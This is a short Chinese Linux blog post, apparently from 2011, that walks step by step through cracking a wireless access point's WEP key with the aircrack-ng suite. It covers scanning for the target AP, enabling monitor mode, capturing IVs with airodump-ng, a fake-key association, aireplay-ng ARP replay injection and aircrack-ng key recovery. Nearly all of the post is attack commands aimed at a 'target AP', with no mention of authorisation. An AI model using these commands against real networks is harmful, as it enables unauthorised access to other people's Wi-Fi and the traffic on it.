Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1721640
  • 博文数量: 293
  • 博客积分: 10574
  • 博客等级: 上将
  • 技术积分: 5085
  • 用 户 组: 普通用户
  • 注册时间: 2006-12-22 17:00
文章分类

全部博文(293)

文章存档

2011年(27)

2010年(84)

2009年(62)

2008年(120)

我的朋友

分类: LINUX

2011-09-07 13:58:47

首先扫面AP,iwlist sanning 记下AP的channel和mac地址

 

1. ifconfig -a 查看网络接口情况,我的无线接口是eth0,还要记下mac地址

(确认哪块网卡是无线cat /proc/net/wireless)

 

2. airmon-ng start eth0 启动Monitor,系统会反馈已经开启

 

3. airodump-ng --ivs -w name -c 6 eth0 这里的name,你可以随意取个名字,但是不要忘了,破解时要用,6是我要破解的AP频道,我的目标AP6,此窗口保留,另开一个窗口,继续下面的操作。

 

4. modprobe ipw2200 rtap_iface=1

 

5. iwconfig eth0 ap 00:00:00:00:00:00 其中00:00:00:00:00:00是目标APMAC

 

6. iwconfig eth0 key s:fakekey

 

7. iwconfig eth0 mode managed 以上这些是加载2200BG的补丁及目标AP的连接,在此窗口继续下面的内容

 

8. aireplay-ng -3 -b AP的mac地址 -h 本机无线网卡的mac地址 eth0 这是发起对目标AP的攻击,此时系统会开始运行攻击,并显示情况,第一个值在不断增加,你需要耐心等到那一刻,当这一刻到来时,你就成功一半了,这时第一个窗口里目标APData值在猛涨,当目标APData值涨到10000以上时,你就可以再打开一个新的窗口开始破解了

 

9.aircrack-ng -n 64 name-01.ivs 这就是在新窗口下的破解命令,不知道它是64位加密还是128位加密,你就用64位吧,name就是你最开始的命令里自定义的名称,别搞错了,此时系统会列出所有信号,并让你选择要破解的AP,目标AP那一行最后有括号(ivs),表示它拥有收集到的可破解的信息,输入它的数字编号,回车,系统开始为你破解很快你就会看到KEY FOUND:[这里是你要的密码]

阅读(369) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~